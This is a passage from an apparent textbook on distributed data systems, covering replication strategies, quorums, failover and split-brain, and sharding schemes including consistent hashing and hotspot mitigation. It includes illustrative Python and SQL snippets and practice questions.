A single leader has two limitations that no amount of follower-adding fixes: all writes must reach one machine, and if users are spread across continents, half of them pay a cross-ocean round trip on every write. Multi-leader replication allows several nodes to accept writes and replicate to each other — typically one leader per region, or one per datacenter.
The benefit is local write latency and survival of a whole region. The cost is severe and unavoidable: two leaders can accept conflicting writes to the same row before either learns of the other, so conflict resolution stops being a theoretical concern and becomes a feature you must design.
MULTI-LEADER ACROSS REGIONS
[EU users] -> [EU leader] <====async replication====> [US leader] <- [US users]
| |
[EU followers] [US followers]
Local writes: ~5 ms instead of ~90 ms. Region loss: survivable.
THE CONFLICT
t=0 EU: UPDATE users SET name='Ada L.' | US: UPDATE users SET name='A. Lovelace'
t=1 both commit locally, both succeed |
t=2 replication crosses; each node now sees a change it did not expect.
Which one is correct? The database cannot know. YOU must decide.
# Conflict resolution strategies, weakest to strongest.
# 1. LAST WRITE WINS: simple, and silently destroys data. Also depends on
# clocks agreeing across regions, which they do not (Chapter 8.3).
def lww(a, b):
return a if a.timestamp > b.timestamp else b # the loser is just gone
# 2. APPLICATION-DEFINED MERGE: correct when the domain has a merge rule.
def merge_cart(a, b):
items = {}
for item in a.items + b.items:
# Union with max quantity: adding from two devices keeps both additions.
items[item.product_id] = max(items.get(item.product_id, 0), item.qty)
return Cart(items)
# 3. CONFLICT-FREE DATA TYPES (CRDTs, Chapter 8.5): structure the data so
# concurrent updates merge deterministically with no coordination.
# A counter becomes per-node counters that are summed:
counter = {"eu": 12, "us": 7} # each region increments its own key
total = sum(counter.values()) # 19 — no conflict is possible
# 4. AVOID CONFLICTS ENTIRELY: partition write ownership so two leaders never
# touch the same row. Route every user's writes to their home region.
def leader_for(user):
return LEADERS[user.home_region] # the strategy most systems should use
| Topology | Structure | Trade-off |
|---|---|---|
| Circular | Each node replicates to the next | Cheap; one node down breaks the ring |
| Star | One hub relays to all | Simple; the hub is a single point of failure |
| All-to-all | Every node to every other | Resilient; messages can arrive out of order |
Multi-leader is genuinely necessary in a few situations: multi-region write locality, offline-capable clients (each device is effectively a leader that syncs later), and collaborative editing. Outside those, the complexity rarely pays — and the most common successful pattern is the fourth one above: partition ownership so conflicts cannot occur, which gives local writes without conflict resolution.
Key Takeaways
- Multiple leaders give local write latency and regional fault tolerance.
- Concurrent conflicting writes become unavoidable and must be resolved explicitly.
- Last-write-wins is simple and silently loses data; prefer domain merges or CRDTs.
- The best strategy is usually to partition write ownership so conflicts never arise.
🧪 Practice
- Design conflict resolution for a shopping cart edited on two devices while offline.
- Explain why last-write-wins is unsafe across regions even with NTP running.
- Interview: When is multi-leader replication the right choice? (Hint: name a requirement that a single leader cannot satisfy at all, not merely one it satisfies slowly.)
Leaderless Replication and Quorums
Both previous schemes have a designated writer, so a leader failure means writes stop until failover finishes. Leaderless replication removes the role entirely: a client (or a coordinator on its behalf) writes to several replicas directly and reads from several replicas, using overlap to guarantee it sees current data. Dynamo, Cassandra, and Riak popularized this design.
The mechanism is the quorum condition. With N replicas, W acknowledgements
required for a write, and R responses required for a read, if W + R > N then
any read set and any write set must share at least one replica — so a read is
guaranteed to see the latest acknowledged write.
N = 3, W = 2, R = 2 (W + R = 4 > 3)
WRITE v2 to replicas A and B (2 acks: done) A[v2] B[v2] C[v1]
READ from B and C ^^^^^^^^^^^
-> responses: v2 (from B) and v1 (from C)
-> the overlap guarantees v2 is present; newest version wins
-> read repair: C is updated to v2 in the background
Tuning the same N for different goals:
W=1, R=1 fastest, no overlap guarantee -> eventual consistency
W=3, R=1 fast reads, writes fail if ANY replica is down
W=1, R=3 fast writes, slow reads, writes survive 2 failures
W=2, R=2 balanced: survives one node down for both reads and writes
def quorum_write(key, value, replicas, W):
version = hlc_now() # a version, not a wall clock
acks, errors = 0, []
for r in replicas: # in practice: send in parallel
try:
r.put(key, value, version); acks += 1
except Exception as e:
errors.append(e)
if acks >= W:
return "ok" # return as soon as W agree
raise QuorumNotMet(f"{acks}/{W} acks", errors)
# Note: replicas that DID succeed keep the write. A failed quorum write is
# not rolled back — the value may still surface later. That is the biggest
# semantic difference from a transactional database.
def quorum_read(key, replicas, R):
responses = [r.get(key) for r in replicas[:R]]
newest = max(responses, key=lambda x: x.version)
for r, resp in zip(replicas[:R], responses):
if resp.version < newest.version:
r.put(key, newest.value, newest.version) # read repair, in background
return newest.value
Because failed writes are not rolled back and replicas can miss updates while briefly unavailable, leaderless systems need two background mechanisms: read repair (fix stale replicas when a read notices) and anti-entropy (a background process comparing replicas via Merkle trees and reconciling differences). Some systems also use hinted handoff, where a healthy node temporarily stores writes destined for an unavailable peer.
| Property | Leaderless |
|---|---|
| Write availability | High — no failover; any W replicas suffice |
| Consistency | Tunable per operation via W and R |
| Conflicts | Possible; resolved by version vectors or LWW |
| Operational model | Symmetric nodes, easy to add capacity |
| Weakness | No transactions; quorum reads cost latency; sloppy quorums weaken the guarantee |
The important caveat: W + R > N guarantees overlap only under a strict
quorum. Many systems default to sloppy quorums, where writes may be accepted
by any W reachable nodes rather than the W that actually own the key — which
raises availability and quietly removes the overlap guarantee.
Key Takeaways
- Leaderless replication removes failover entirely: any
Wreplicas can accept a write.W + R > Nguarantees a read overlaps the latest write — the core quorum condition.- Tune
WandRper operation to trade latency, availability, and consistency.- Failed quorum writes are not rolled back, and sloppy quorums break the overlap guarantee.
🧪 Practice
- For
N = 5, list every(W, R)pair satisfying the quorum condition and rank them by write latency.- Explain what a client can and cannot conclude when a quorum write returns an error.
- Interview: With
N=3, W=2, R=2, how many node failures can the system tolerate for writes, and for reads? (Hint: count how many must respond and how many remain.)
Synchronous vs. Asynchronous Replication
Every replication scheme faces one question at commit time: does the leader wait for replicas before telling the client "committed"? The answer sets the system's durability guarantee, its write latency, and its behaviour when a replica is slow — and it is the single most consequential replication setting.
Asynchronous: the leader commits locally and acknowledges immediately; replicas catch up afterwards. Fast, and a replica being slow or down does not affect writes. But if the leader dies before shipping recent commits, those acknowledged writes are permanently lost.
Synchronous: the leader waits for at least one replica to confirm before acknowledging. No acknowledged write is lost if the leader dies. But write latency now includes a network round trip, and a stalled replica stalls all writes.
ASYNCHRONOUS SYNCHRONOUS
client -> leader: write client -> leader: write
leader: fsync local WAL leader: fsync local WAL
leader -> client: OK (~2 ms) leader -> replica: ship, wait for ack
leader -> replica: ship (later) replica: fsync, ack (+1 RTT)
leader -> client: OK (~4 ms same AZ,
Leader dies now -> recent commits ~90 ms cross-region)
are gone. RPO > 0.
Leader dies now -> replica has everything.
Replica hangs -> writes hang too.
-- PostgreSQL: the durability dial, from fastest to safest.
SET synchronous_commit = off; -- not even local fsync: fast, lossy
SET synchronous_commit = local; -- local fsync only: async replication
SET synchronous_commit = on; -- wait for the synchronous standby
-- Semi-synchronous: the practical middle ground for multi-replica setups.
-- Wait for ANY 1 of 3 named standbys — durability without depending on a
-- specific replica being healthy.
ALTER SYSTEM SET synchronous_standby_names = 'ANY 1 (replica_a, replica_b, replica_c)';
-- Per-transaction control: pay for durability only where it matters.
BEGIN;
SET LOCAL synchronous_commit = on; -- this payment must not be lost
INSERT INTO payments ...;
COMMIT;
| Aspect | Asynchronous | Synchronous |
|---|---|---|
| Write latency | Local commit only | Plus one replica round trip |
| Data loss on leader failure | Possible (RPO > 0) | None (RPO = 0) |
| Slow/failed replica | No impact on writes | Writes block or degrade |
| Cross-region cost | Free | Adds full inter-region latency |
| Typical use | Read replicas, analytics, DR copies | Financial and regulated data |
The pattern most production systems settle on is semi-synchronous: one synchronous replica in a different availability zone (cheap — sub-millisecond, so the latency cost is small) plus asynchronous replicas elsewhere for read scaling and cross-region disaster recovery. That buys RPO = 0 for facility failure without paying cross-region latency on every commit.
It is also worth being explicit about what synchronous replication does not guarantee: it means the replica has the data, not that the replica has applied it, and not that a failover will actually happen correctly. That last part is the next topic.
Key Takeaways
- Asynchronous replication is fast and can lose acknowledged writes when the leader fails.
- Synchronous replication guarantees RPO = 0 at the cost of a round trip per commit and coupling to replica health.
- Semi-synchronous (wait for any one of several) gives durability without depending on one replica.
- Set the durability level per data class — payments and analytics do not need the same guarantee.
🧪 Practice
- Compute added write latency for a synchronous replica in the same AZ (0.5 ms RTT) versus another region (80 ms RTT), at 200 writes per transaction.
- Explain what "RPO = 0" means concretely to a user who just clicked Pay.
- Interview: Your synchronous replica has a disk problem and writes have stopped cluster-wide. What are your options right then? (Hint: consider what you can change quickly and what you are giving up by changing it.)
Replication Lag and Read-Your-Writes
Asynchronous replication means followers are always slightly behind — usually milliseconds, sometimes minutes under load or during a bulk operation. That delay is replication lag, and it produces a family of user-visible bugs that are notoriously hard to reproduce, because they depend on which replica happened to answer.
The three classic anomalies each break a different intuition:
1. READ-YOUR-WRITES violated
User edits their profile -> write goes to the leader
User reloads -> read hits a lagging follower
"My change didn't save!" (it did; they just cannot see it)
2. MONOTONIC READS violated
Read 1 -> follower A (up to date) sees the new comment
Read 2 -> follower B (behind) comment is gone
Time appears to run backwards.
3. CONSISTENT PREFIX violated
Q: "How far is the restaurant?" written at t=1
A: "About 2 kilometres" written at t=2
A replica applies them out of order -> the answer appears before the question.
# Fix 1: route the user's own reads to the leader for a short window after a write.
def read_profile(user_id, session, leader, followers):
if session.wrote_recently(user_id, within_ms=1000):
return leader.get_profile(user_id) # read-your-writes guaranteed
return pick(followers).get_profile(user_id)
# Fix 2: LSN pinning — precise instead of time-based. Capture the write position,
# then require any replica serving this user to have replayed at least that far.
def write_profile(user_id, data, leader, session):
lsn = leader.execute_returning_lsn("UPDATE profiles ...", data)
session.set_min_lsn(user_id, lsn) # remember the exact position
return lsn
def read_profile_pinned(user_id, session, leader, followers):
need = session.get_min_lsn(user_id)
caught_up = [f for f in followers if f.replay_lsn() >= need]
return (pick(caught_up) if caught_up else leader).get_profile(user_id)
# Fix 3: sticky routing — pin one user's session to one replica for its duration.
# Gives monotonic reads cheaply, but concentrates load unevenly.
| Anomaly | Guarantee needed | Cheapest practical fix |
|---|---|---|
| Missing own write | Read-your-writes | Route to leader after write, or LSN pinning |
| Data disappearing | Monotonic reads | Sticky routing to one replica per session |
| Effect before cause | Consistent prefix | Keep causally related writes in one partition |
Two operational habits matter as much as the code. Alert on lag, not just on
liveness — a follower 90 seconds behind is a correctness problem while
reporting perfect health. And remove lagging replicas from the read pool
automatically, since the common cause of a lag spike (a long transaction, a bulk
UPDATE, a vacuum storm) also makes the stale data most damaging.
Key Takeaways
- Replication lag causes read-your-writes, monotonic read, and consistent prefix violations.
- Route a user's reads to the leader briefly after their write, or pin to a replication position.
- Sticky per-session routing gives monotonic reads at the cost of uneven load.
- Monitor lag as a first-class metric and eject lagging replicas from the read pool.
🧪 Practice
- Reproduce a read-your-writes violation on paper with a 200 ms lag and a client that reads 50 ms after writing.
- Implement LSN-based routing and describe its behaviour when every follower is behind.
- Interview: Users report intermittently missing data after saving, but it is always there on a later refresh. Diagnose. (Hint: ask what differs between the failing and succeeding request — it is not the code path.)
Failover and Split-Brain
Replication protects data; failover is the process that turns a replica into the new leader when the old one fails. It is the part of the system that runs only during incidents, which is exactly why it is the least tested and most dangerous component — and why the worst database outages are usually failover going wrong rather than the original hardware failure.
Failover has three steps and each has a failure mode:
1. DETECT Is the leader really dead, or just slow, or is the network broken
between us and it? This is undecidable in general (Chapter 8.1).
Too eager -> unnecessary failover. Too slow -> long outage.
2. ELECT Choose a new leader — ideally the most up-to-date replica.
Choosing a lagging replica silently discards recent commits.
3. REDIRECT Point clients, proxies, and the old leader at the new topology.
Miss any of them and you have two leaders.
Split-brain is the catastrophe: the old leader was never actually dead (just partitioned or paused), a new leader was promoted, and now two nodes accept writes on the same data. Both sets of writes are "committed", they diverge, and reconciliation afterwards is manual and lossy.
SPLIT-BRAIN
before: [L] <- clients
/ \
[F1] [F2]
network splits: [L] <- some clients still reach it and keep writing
~~~~~~~~ partition ~~~~~~~~
[F1 -> promoted to leader] <- other clients write here
[F2]
Both accept writes. Both are internally consistent. Together they are
irreconcilable: two different "true" histories of the same rows.
THE THREE DEFENCES
1. QUORUM-BASED ELECTION
Only a majority partition may elect a leader. With 3 nodes, a 1-node
partition can never win — which is why an ODD number of nodes matters,
and why 2-node clusters cannot safely fail over at all.
2. FENCING (STONITH)
Before promoting, forcibly disable the old leader: revoke its storage
lease, block it at the network layer, or power it off. "Shoot The Other
Node In The Head" is a real and deliberately blunt term.
3. LEASES / EPOCH NUMBERS
A leader holds a time-bounded lease and must renew it. Each promotion
increments an epoch; storage and clients reject writes carrying an old
epoch, so a revived zombie leader is refused rather than obeyed.
# Epoch fencing: the storage layer, not the application, enforces single-writer.
class FencedStorage:
def __init__(self):
self.epoch = 0
def promote(self, node):
self.epoch += 1 # every promotion invalidates the past
return self.epoch
def write(self, node, epoch, data):
if epoch < self.epoch:
# The old leader woke up and tried to write with a stale epoch.
raise FencedOut(f"epoch {epoch} < current {self.epoch}")
return self._apply(data)
# This is why cloud block storage and consensus systems expose fencing tokens:
# correctness cannot rest on the old leader noticing it was replaced.
| Decision | Trade-off |
|---|---|
| Detection timeout | Short: false failovers. Long: extended outages |
| Automatic vs. manual | Automatic is fast and can be wrong; manual is slow and deliberate |
| Promote most-current replica | Minimizes data loss; may not be available |
| Number of nodes | Odd numbers only; three minimum for a real quorum |
| Old leader's unreplicated writes | Usually discarded — and clients were told they committed |
That last row is the honest summary of asynchronous failover: some acknowledged writes are thrown away. If that is unacceptable, you need synchronous replication, and you should rehearse failover regularly (Chapter 9.4) rather than discovering its behaviour during an incident.
Key Takeaways
- Failover is detect, elect, redirect — and each step can fail in its own way.
- Split-brain means two leaders accepting divergent writes; reconciliation is manual and lossy.
- Defend with majority-quorum election, fencing of the old leader, and epoch/lease tokens enforced by storage.
- Asynchronous failover discards unreplicated commits that clients were told had succeeded — rehearse it before it happens for real.
🧪 Practice
- Explain why a two-node cluster cannot safely perform automatic failover, and what minimum change fixes it.
- Design a fencing mechanism for a service whose leader writes to shared object storage.
- Interview: Your failover promoted a replica that was 30 seconds behind. What are the consequences and how do you prevent a repeat? (Hint: name what those 30 seconds contained and who was told it was safe.)
<a id="45-partitioning-and-sharding"></a>
4.5 Partitioning and Sharding
Replication copies the same data everywhere; partitioning splits different data across machines, which is the only way to scale writes and datasets past what one machine can hold.
Vertical vs. Horizontal Partitioning
When one database can no longer hold the data or absorb the write rate, you split it. There are exactly two directions to cut, and they solve different problems — confusing them is a common source of wasted migrations.
Vertical partitioning splits by column or by table: move some columns to a separate table, or some tables to a separate database. It is the natural first step, it often follows service boundaries, and it is straightforward — but it has a ceiling, because eventually one table alone is too big.
Horizontal partitioning (sharding) splits by row: the same schema lives on many machines, each holding a disjoint subset of rows. This is the one that scales without limit, and it is also the one that costs you joins, transactions, and operational simplicity.
ORIGINAL TABLE
users(id, email, name, bio, avatar_blob, last_login, preferences_json)
VERTICAL (split columns by access pattern)
users_core(id, email, name, last_login) <- hot: read constantly, small
users_profile(id, bio, avatar_url, prefs) <- cold: read rarely, large
Effect: the hot table's rows are smaller, so more fit per page and the
buffer pool holds more of it. Same machine, better cache behaviour.
HORIZONTAL (split rows across machines)
shard 0: users where id % 4 = 0 shard 2: users where id % 4 = 2
shard 1: users where id % 4 = 1 shard 3: users where id % 4 = 3
Effect: 4x the write capacity, 4x the storage — and no cross-shard joins.
-- Native table partitioning: horizontal splitting WITHIN one database.
-- Not distribution, but it delivers partition pruning and instant drops.
CREATE TABLE events (
id BIGSERIAL,
occurred_at TIMESTAMPTZ NOT NULL,
payload JSONB
) PARTITION BY RANGE (occurred_at);
CREATE TABLE events_2026_03 PARTITION OF events
FOR VALUES FROM ('2026-03-01') TO ('2026-04-01');
-- The query planner touches only the relevant partition:
SELECT * FROM events WHERE occurred_at >= '2026-03-15'; -- one partition scanned
-- Retention becomes instant instead of an hours-long DELETE:
DROP TABLE events_2026_01; -- metadata operation
| Dimension | Vertical partitioning | Horizontal sharding |
|---|---|---|
| Splits by | Columns or tables | Rows |
| Scales | Until one table is too big | Effectively without limit |
| Joins | Preserved within each side | Lost across shards |
| Transactions | Preserved within each side | Lost across shards |
| Operational cost | Low | High |
| Typical trigger | Mixed hot/cold columns; service extraction | Write throughput or dataset size |
The order to attempt these matters, because each step is cheaper than the next:
optimize queries and indexes, then add read replicas, then cache, then partition
tables within one database, then vertically split, and only then shard. Sharding
is the last resort not because it does not work, but because it permanently
changes what your application may assume — no cross-shard joins, no global
transactions, no global AUTO_INCREMENT, no simple ORDER BY ... LIMIT.
Key Takeaways
- Vertical partitioning splits columns or tables; horizontal sharding splits rows across machines.
- Only horizontal sharding scales writes and dataset size without limit.
- Native table partitioning gives pruning and instant retention drops without distribution.
- Exhaust indexing, replicas, caching, and partitioning before sharding — it is a one-way door.
🧪 Practice
- Identify hot and cold columns in a
userstable and design the vertical split.- Write a monthly range partition scheme for an events table with a 13-month retention policy.
- Interview: A team wants to shard because "the database is slow". What do you check first? (Hint: sharding fixes exactly two problems — name them, and confirm the team has one.)
Range-Based Sharding
Once you have decided to shard, you must decide how rows map to shards. Range-based sharding assigns contiguous key ranges to shards: A-F on shard 1, G-M on shard 2, and so on. It is the scheme used by HBase, Bigtable, and MongoDB's ranged sharding, and its defining property is that sorted order is preserved.
That property is worth a lot. Range queries — "all orders between these dates", "all usernames starting with 'Sm'" — touch only the shards covering that range, often just one. No other scheme gives you that.
RANGE SHARDING BY DATE
shard 0: 2026-01-01 .. 2026-03-31
shard 1: 2026-04-01 .. 2026-06-30
shard 2: 2026-07-01 .. 2026-09-30
shard 3: 2026-10-01 .. open <- ALL current writes land here
Range query "last 7 days" -> 1 shard. Excellent.
Write distribution -> 1 shard doing 100% of the work. Catastrophic.
That diagram is the whole trade. Range sharding on a monotonically increasing key (a timestamp, an auto-increment id) creates a permanent hotspot: every write goes to the last shard while the others sit idle. The classic mitigation is a compound key that puts a high-cardinality attribute first:
# BAD: pure time ordering -> all writes hit the newest shard
shard_key = event.timestamp
# BETTER: distribute by entity, keep time ordering WITHIN each entity
shard_key = (event.device_id, event.timestamp)
# Writes spread across devices; "last hour for device X" is still one shard's
# contiguous range. This is the same idea as Cassandra's partition + clustering
# key from 4.3.
# The routing function must handle boundaries carefully.
RANGES = [ # (inclusive_start, exclusive_end, shard)
(None, "f", 0), # None = unbounded below
("f", "m", 1),
("m", "t", 2),
("t", None, 3), # None = unbounded above
]
def shard_for(key):
for start, end, shard in RANGES:
if (start is None or key >= start) and (end is None or key < end):
return shard
raise KeyError(key) # gaps in the range map are a real outage source
| Property | Range sharding |
|---|---|
| Range queries | Excellent — contiguous keys stay together |
| Write distribution | Poor for sequential keys; excellent for random ones |
| Rebalancing | Natural: split a hot range into two |
| Adding a shard | Split an existing range; move only that data |
| Metadata | Requires a range map that must stay authoritative |
| Hotspot risk | High, and structural rather than accidental |
The rebalancing story is range sharding's second real advantage: when a range gets too large or too hot, the system splits it in half and moves one half elsewhere. Only that range's data moves, and it happens automatically in systems like HBase and CockroachDB.
Key Takeaways
- Range sharding assigns contiguous key ranges, preserving sort order.
- Range queries touch only the relevant shards — its decisive advantage.
- Sequential keys create a permanent write hotspot on the last shard.
- Prefix the key with a high-cardinality attribute to distribute writes while keeping local ordering.
🧪 Practice
- Design a range shard key for IoT readings that supports "last 24 hours for one device" without hotspotting.
- Explain what happens to a range-sharded cluster when a range map has a gap or an overlap.
- Interview: Why does range sharding on
created_atfail for a write-heavy system, and how do you fix it while keeping time-range queries fast? (Hint: the fix does not remove time from the key — it changes what comes first.)
Hash-Based Sharding
If the problem with range sharding is uneven distribution, the direct fix is to destroy the ordering deliberately. Hash-based sharding applies a hash function to the key and uses the result to select a shard, which spreads even perfectly sequential keys uniformly across the cluster.
This is the most common scheme for OLTP workloads that are dominated by single-key lookups, because it gives excellent write distribution with almost no metadata — you compute the shard rather than looking it up.
import hashlib
def shard_for(key, num_shards):
# Use a stable hash, not Python's built-in hash(): the built-in is
# randomized per process, so the same key would route differently on every
# restart. This bug corrupts data silently.
digest = hashlib.md5(str(key).encode()).digest()
return int.from_bytes(digest[:8], "big") % num_shards
for user_id in (1, 2, 3, 1000, 1001):
print(user_id, shard_for(user_id, 4))
# Sequential ids scatter across all 4 shards — exactly what range sharding
# could not do.
THE COST: ORDER IS GONE
Range sharding Hash sharding
"users starting with 'Sm'" "users starting with 'Sm'"
-> 1 shard -> ALL shards (scatter-gather)
Every non-key query becomes a fan-out to every shard, and the client must
merge and re-sort the results. At 64 shards, one such query is 64 queries,
and its latency is the SLOWEST shard's, not the average (Chapter 1.2).
AND THE RESHARDING PROBLEM
shard = hash(key) % 4 -> shard = hash(key) % 5
Changing the modulus remaps ALMOST EVERY KEY. Roughly 80% of the data must
move to add one shard. This is why naive modulo hashing is a trap, and why
consistent hashing (two topics ahead) exists.
A common intermediate solution is to fix the number of logical shards high (say 1,024) and map many logical shards onto each physical node. Growing the cluster then means moving whole logical shards between nodes without rehashing anything:
LOGICAL_SHARDS = 1024 # chosen once, never changed
def logical_shard(key):
return int.from_bytes(hashlib.md5(str(key).encode()).digest()[:8], "big") % LOGICAL_SHARDS
# A small, explicit map from logical shard -> physical node. Growing the cluster
# updates this map and moves the affected logical shards only.
PLACEMENT = {n: n * 4 // LOGICAL_SHARDS for n in range(LOGICAL_SHARDS)}
def physical_node(key):
return PLACEMENT[logical_shard(key)]
| Property | Hash sharding |
|---|---|
| Write distribution | Excellent and automatic |
| Point lookups | Excellent — compute the shard, one hop |
| Range queries | Poor — scatter-gather across all shards |
| Metadata | Minimal (or a small logical-shard map) |
| Adding a shard | Catastrophic with plain modulo; fine with logical shards or consistent hashing |
| Hotspot risk | Low, unless one key is itself hot |
That last caveat matters: hashing distributes keys, not traffic. If one celebrity user's row receives 30% of all reads, hashing puts all of it on one shard just as reliably as range sharding would.
Key Takeaways
- Hashing distributes even sequential keys uniformly, solving write hotspots.
- It destroys ordering, so range queries become scatter-gather across every shard.
- Never use a process-randomized hash function for routing.
- Plain
hash % Nmakes resharding move almost all data — use fixed logical shards or consistent hashing.
🧪 Practice
- Compute what fraction of keys change shard when going from 4 to 5 shards with plain modulo hashing.
- Explain why
ORDER BY created_at LIMIT 10is expensive on a hash-sharded table and how a client must implement it.- Interview: Hash sharding spread your data evenly but one shard is still at 90% CPU. What is happening? (Hint: even key distribution is not the same as even request distribution.)
Directory-Based Sharding
Both previous schemes compute a shard from the key, which means the mapping is fixed by a formula. Directory-based sharding stores the mapping instead: a lookup service holds an explicit table of key (or key range, or tenant) to shard, and every request consults it.
The gain is total flexibility. You can move one noisy tenant to dedicated hardware, keep European customers on European infrastructure, place a large customer on a bigger machine, and rebalance any individual entity at any time — none of which a hash function can express.
DIRECTORY LOOKUP
request(tenant=acme)
|
v
[ directory service ] tenant -> shard
acme -> shard_7 (dedicated, they are 40% of our load)
globex -> shard_2
initech -> shard_2
eu_corp -> shard_eu1 (data residency requirement)
|
v
[ shard_7 ]
The directory is consulted on EVERY request, so it must be:
fast (cached aggressively in each client)
correct (a stale entry routes to the wrong shard -> data appears missing)
available (it is now on the critical path of every query)
class ShardDirectory:
def __init__(self, store, cache_ttl=60):
self._store = store # durable: Postgres, etcd, ZooKeeper
self._cache = TTLCache(maxsize=100_000, ttl=cache_ttl)
def shard_for(self, tenant_id):
if tenant_id in self._cache:
return self._cache[tenant_id]
shard = self._store.get(f"tenant:{tenant_id}") # durable lookup
if shard is None:
raise UnknownTenant(tenant_id)
self._cache[tenant_id] = shard
return shard
def migrate(self, tenant_id, new_shard):
# Migration is a controlled, per-tenant operation — the whole point of
# this scheme. The order matters:
# 1. copy data to the new shard while writes continue on the old
# 2. briefly freeze writes for this tenant only
# 3. copy the delta, then flip the directory entry
# 4. invalidate caches (or accept up to cache_ttl of misrouting)
# 5. keep the old copy read-only until verified, then delete
self._store.set(f"tenant:{tenant_id}", new_shard)
self._cache.pop(tenant_id, None)
broadcast_invalidation(tenant_id) # tell every client to drop its entry
| Property | Directory sharding |
|---|---|
| Flexibility | Total — any entity can live anywhere |
| Rebalancing | Per-entity, incremental, online |
| Heterogeneous shards | Supported (big tenants on big machines) |
| Data residency | Supported (route by jurisdiction) |
| Extra hop | One lookup per request (mitigated by caching) |
| Failure mode | The directory is a critical dependency and a single point of failure |
| Cardinality limit | Works per-tenant; impractical per-row at billions of keys |
This is the standard architecture for multi-tenant B2B SaaS, where tenants vary enormously in size and some have contractual isolation or residency requirements. It is impractical for per-row mapping at very large scale, since the directory itself becomes the thing that needs sharding.
The operational rule: cache the directory everywhere and make invalidation explicit. A stale entry does not produce an error — it produces a query against the wrong shard that returns no rows, which the application will happily interpret as "the data does not exist".
Key Takeaways
- Directory sharding stores an explicit mapping instead of computing one.
- It enables per-entity placement: dedicated shards, heterogeneous hardware, data residency.
- Migration becomes an online, per-tenant operation rather than a cluster-wide rehash.
- The directory is on every request's critical path — cache it, replicate it, and invalidate deliberately.
🧪 Practice
- Design the directory schema and cache strategy for 50,000 tenants across 20 shards.
- Write the step-by-step runbook for migrating one tenant with zero data loss and minimal write downtime.
- Interview: What happens if a client caches a stale directory entry during a migration? (Hint: the dangerous case is not an error — describe what the application sees instead.)
Consistent Hashing
Plain modulo hashing has one fatal operational property: changing the number of
shards remaps nearly every key. Adding a fifth node to a four-node cluster moves
roughly 80% of the data, which means growing the cluster is a full migration.
Consistent hashing reduces that to roughly 1/n of the keys — only the data
that must move, moves.
The trick is to hash both keys and nodes onto the same circular space. A key belongs to the first node encountered walking clockwise from the key's position. Adding a node captures only the arc between it and its predecessor; removing one hands its arc to the next node clockwise. Everything else is untouched.
THE HASH RING (positions 0 .. 2^32-1, wrapped into a circle)
0/2^32
|
nodeC ----+---- nodeA
\ | /
\ | / key -> hash -> walk CLOCKWISE -> first node
\ | /
\ | /
nodeB
Add nodeD between nodeA and nodeB:
only keys in the arc (nodeA, nodeD] move — from nodeB to nodeD.
Keys owned by nodeA and nodeC are completely unaffected.
The naive ring has a flaw: with few nodes, the arcs are wildly uneven, so one node may own three times another's data. The fix is virtual nodes — place each physical node at many positions on the ring, so the law of large numbers evens out the arcs.
import hashlib, bisect
class ConsistentHashRing:
def __init__(self, nodes, vnodes=150):
self._vnodes = vnodes # more vnodes -> more even distribution
self._ring = {} # ring position -> physical node
self._sorted = [] # sorted positions, for binary search
for n in nodes:
self.add(n)
def _hash(self, s):
return int.from_bytes(hashlib.md5(s.encode()).digest()[:4], "big")
def add(self, node):
for i in range(self._vnodes):
pos = self._hash(f"{node}#{i}") # 150 positions per node
self._ring[pos] = node
bisect.insort(self._sorted, pos)
def remove(self, node):
for i in range(self._vnodes):
pos = self._hash(f"{node}#{i}")
del self._ring[pos]
self._sorted.remove(pos)
def node_for(self, key):
pos = self._hash(key)
idx = bisect.bisect_right(self._sorted, pos) # first position >= key
if idx == len(self._sorted):
idx = 0 # wrap around the circle
return self._ring[self._sorted[idx]]
def nodes_for(self, key, replicas=3):
"""Walk clockwise past distinct physical nodes — this is how quorum
replication in 4.4 picks which N replicas hold a key."""
pos = self._hash(key)
idx = bisect.bisect_right(self._sorted, pos) % len(self._sorted)
chosen = []
for i in range(len(self._sorted)):
node = self._ring[self._sorted[(idx + i) % len(self._sorted)]]
if node not in chosen:
chosen.append(node)
if len(chosen) == replicas:
break
return chosen
KEYS MOVED WHEN GROWING A CLUSTER (fraction of total data)
nodes: 4 -> 5 plain modulo: ~80% consistent hashing: ~20% (1/5)
nodes: 10 -> 11 plain modulo: ~91% consistent hashing: ~9% (1/11)
nodes: 100 -> 101 plain modulo: ~99% consistent hashing: ~1% (1/101)
Consistent hashing moves exactly the data the new node will own — the
theoretical minimum.
Consistent hashing is what underpins Cassandra, DynamoDB, Riak, memcached client libraries, and CDN request routing. Its main limitation is inherited from hashing in general: ordering is still destroyed, so range queries remain scatter-gather, and a single hot key is still concentrated on one node.
Key Takeaways
- Consistent hashing maps keys and nodes onto a ring; a key belongs to the next node clockwise.
- Adding or removing a node moves only about
1/nof keys instead of nearly all of them.- Virtual nodes are required for even distribution and for smooth load transfer on failure.
- Walking the ring past distinct nodes also selects the replica set for quorum systems.
🧪 Practice
- Implement the ring above and empirically measure the distribution across 5 nodes with 10,000 keys, at 1 vnode and at 150.
- Explain why removing a node without virtual nodes dumps all its load on a single neighbour.
- Interview: Consistent hashing minimizes data movement — what problem does it not solve? (Hint: think about what happens when one particular key is requested a million times per second.)
Hotspots and Skew Mitigation
Every sharding scheme assumes load spreads across keys. Reality rarely obliges. Real data follows power laws: a few products account for most sales, a few users generate most traffic, and a celebrity account has millions of followers while the median has fifty. Skew is uneven data distribution; a hotspot is uneven traffic distribution. They are different problems and need different fixes.
The distinction matters because the diagnosis differs. If one shard holds 10x the rows, that is data skew. If every shard holds the same rows but one shard's CPU is pinned, that is a traffic hotspot — and rebalancing data will not help at all.
THREE FAILURE SHAPES
1. DATA SKEW shard 0: 40 GB shard 1: 40 GB shard 2: 400 GB
cause: a shard key with uneven cardinality
(sharding by country when 80% of users are in one)
2. TRAFFIC HOTSPOT shard 0: 2k QPS shard 1: 2k QPS shard 2: 90k QPS
cause: one popular key (a celebrity, a viral post)
3. TEMPORAL HOTSPOT all writes hit the newest shard
cause: a monotonically increasing shard key
# FIX 1: SALTING — split one hot key into N sub-keys so it spans shards.
HOT_KEYS = {"user:celebrity_1", "product:flash_sale"}
SALT_BUCKETS = 32
def write_key(key):
if key in HOT_KEYS:
return f"{key}#{random.randrange(SALT_BUCKETS)}" # spread the writes
return key
def read_all(key, store):
if key in HOT_KEYS:
# The cost of salting: reads must gather every bucket and merge.
parts = [store.get(f"{key}#{i}") for i in range(SALT_BUCKETS)]
return merge(parts)
return store.get(key)
# FIX 2: CACHE THE HOT KEY. Often the best answer: a hotspot on a READ path is
# a caching problem, not a sharding problem. One popular row served from Redis
# (or from an in-process cache) never reaches the shard at all.
